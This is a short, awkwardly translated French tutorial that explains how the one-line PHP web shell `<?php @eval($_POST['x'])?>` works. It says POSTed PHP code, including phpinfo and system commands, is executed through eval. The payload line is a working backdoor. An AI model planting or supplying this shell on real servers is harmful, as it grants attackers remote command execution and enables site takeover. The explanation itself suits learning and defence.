Analyse des chevaux de Troie de phrase
Tout d'abord, lors de l'apprentissage de la pénétration, il existe probablement trois types de chevaux de Troie : les gros chevaux, les petits chevaux et une phrase.
Mots courants :
<?php @eval($_POST['x'])?>
Cela devrait être le plus courant... regardez sa composition.
La première est une fonction d'évaluation, suivie en soumettant une valeur avec le paramètre x. Tout d'abord, regardons ce que fait la fonction eval.
Description officielle :
La fonction eval() calcule la chaîne selon le code PHP.
La chaîne doit être du code PHP valide et doit se terminer par un point-virgule.
Si aucune instruction return n'est appelée dans la chaîne de code, NULL est renvoyé. S'il y a des erreurs d'analyse dans le code, la fonction eval() renvoie false.
Syntaxe :
eval(phpcode)
Pour faire simple, il peut exécuter certaines fonctions php et du code php.
De cette façon, nous pouvons le comprendre. beaucoup plus simple. Ne serait-il pas préférable de lui poster directement du code PHP ?
Par exemple : fonction phpinfo(), fonction système, etc.
Vous pouvez voir que la fonction phpinfo que j'ai ici a été exécutée.
L'exécution des commandes est également possible
Le code PHP peut également être exécuté en douceur :
Recommandé Tutoriel vidéo : Tutoriel vidéo PHP
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!